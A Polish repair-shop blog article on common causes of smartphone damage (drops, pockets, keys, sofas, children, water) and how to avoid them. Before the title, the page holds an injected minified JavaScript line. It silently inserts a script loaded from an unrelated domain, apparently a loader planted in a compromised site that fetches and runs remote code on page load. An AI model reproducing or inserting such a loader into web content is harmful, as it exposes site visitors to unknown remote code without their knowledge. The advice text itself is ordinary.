;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Jak zabezpieczyć telefon przed uszkodzeniem? | Silico-Bit
Telefon to urządzenie, którego statystycznie używamy najczęściej. Zaraz po przebudzeniu sięgamy po niego, aby nadrobić informacje, a wieczorem kończymy wraz z nim dzień. Nic dziwnego, że to urządzenie najczęściej ulega uszkodzeniom. Telefon to również najczęściej wymieniany i serwisowany sprzęt elektroniczny. Czy wobec tego można go jednak w jakiś sposób zabezpieczyć przed uszkodzeniem? Przedstawiamy najczęstsze przyczyny usterek telefonów oraz sposoby na ich zapobieganie.


Upadek telefonu może nieść nieodwracalne skutki

 

  1. Upadek z wysokości

Upadek smartfona to najczęściej spotykana przyczyna uszkodzeń tego urządzenia. Podczas uderzenia o podłoże dochodzi do pęknięcia ekranu, obudowy, odłamania niektórych elementów, zniszczenia złącza, rozlania ekranu i wielu innych skutków silnego uderzenia. W zależności od jakości budowy telefonu oraz podłoża, na które spadł, uszkodzenia będą mniejsze lub większe. Aby temu zapobiec, należy unikać sytuacji, w których telefon może łatwo wyślizgnąć się z dłoni. Warto mieć zawsze czyste i suche ręce podczas użytkowania, starać się nie nosić kilku rzeczy w dłoni wraz z telefonem, pewnie trzymać telefon podczas rozmowy czy korzystania z niego, odkładać go zawsze na równą, stabilną powierzchnię.

  1. Otwarte kieszenie

Upadki telefonu zdarzają się także z powodu trzymania go w niezamykanych kieszeniach bluz czy kurtek. Podczas schylania się telefon może bardzo łatwo wypaść i znaleźć się na podłodze. Dlatego wkładając telefon do kieszeni warto upewnić się, że jest ona wystarczająco głęboka.

  1. Rzucanie telefonem

Niestety to nie absurd, a częsta praktyka, kiedy to nie chce nam się podejść do kanapy, aby odłożyć na niej telefon, tylko rzucamy go lekko myśląc, że upadek na tak miękkie podłoże go nie uszkodzi. Nic bardziej mylnego. Mimo, że na pozór nie wydaje się uszkodzony ani nawet zarysowany, takie rzucanie nie służy jego pracy, a wewnątrz mogą dziać się zmiany, które odczujemy podczas jego użytkowania.


Często zapominamy, że telefon jest bardzo kruchym urządzeniem

 

  1. Trzymanie w kieszeni

Wielu mężczyzn nosi telefon w kieszeni spodni, ponieważ nie ma innego miejsca, w którym mogliby go przechowywać. Niestety często o nim zapominają, w wyniku czego dochodzi do wielu uszkodzeń smartfona. Najczęściej spotykanym przypadkiem jest sytuacja, w której telefon noszony w kieszeni został zgnieciony podczas siadania. Zdarzają się także przypadki, w których telefon łamie się pod wpływem siły. Nie należy więc nosić telefonu w kieszeni spodni, szczególnie tylnej.

  1. Trzymanie z kluczami, monetami

Wraz z tematem noszenia telefonu w kieszeniach spodni, pojawia się temat przechowywania go wraz z kluczami lub monetami. Spodnie to również miejsce do przechowywania tych przedmiotów, które mają bezpośredni wpływ na uszkodzenia telefonu. Klucze i monety potrafią mocno poturbować smartfon, którego szybka może się łatwo porysować. Klucze pod wpływem nacisku mogą nawet przedziurawić szybkę. Dobrym sposobem na przechowywanie wszystkich tych przedmiotów w saszetce, nerce czy małej torbie, która dodatkowo posiada specjalną kieszonkę na telefon. Dzięki temu będzie on tam bezpieczny od ostrych i twardych przedmiotów. Sytuacja powtarza się także w przypadku damskich torebek, w których wielość przedmiotów może być niebezpieczna dla telefonu. Tu również wystarczy włożyć telefon w dedykowaną kieszonkę lub przegródkę.

  1. Kładzenie go na kanapie, fotelu

Bardzo często zdarzają się też sytuacje, kiedy to przez nieuwagę, na położony na kanapie telefon ktoś się położył, bądź na niego usiadł. To częsta praktyka, której niestety ciężko się oduczyć. Ze względu na to, że telefon towarzyszy nam praktycznie przez cały dzień, podczas drzemki zakopuje się w kołdrę czy koc. Niewidoczny pod tkaniną telefon w żaden sposób nie jest zabezpieczony. Wystarczy na nim usiąść i uszkodzenie gwarantowane. Pamiętajmy więc od odkładaniu telefonu na szafkę, półkę czy stolik.

  1. Użytkowanie przez dzieci

Wielu rodziców powierza swoje telefony dzieciom. O ile starsze pociechy potrafią z nich korzystać, o tyle maluchy zazwyczaj nie umieją nawet utrzymać go w ręce. Niestety telefon jest dla nich większą atrakcją niż jakakolwiek zabawka, toteż robią wszystko, aby choć na chwilę chwycić je do rączki. Bardzo szybko telefon ląduje jednak na podłodze, pod kanapą, w zupie czy wśród zabawek, powodując tym samym zarysowania, uszkodzenia, a nawet rozlanie ekranu. Wystarczy jednak chronić telefon przed dziećmi, a dzieci przed telefonem.


Nie należy powierzać dziecku obsługi telefonu

  1. Zalanie urządzenia

Zalanie telefonu zdarza się naprawdę bardzo często. Nim się obejrzymy, telefon ląduje w toalecie, wannie pełnej wody, zlewie czy po prostu zostaje zalany kawą. Nic dziwnego, że większość osób nie potrafi sobie poradzić z jego naprawą na własną rękę i zgłaszają się do naszego serwisu. My jednak nie polecamy zabierać smartfona do łazienki, kuchni, a także używać go podczas spożywania posiłku. Prawidłowo użytkowany i chroniony telefon potrafi służyć nam wiele długich lat – wystarczy tylko odpowiednio o niego zadbać.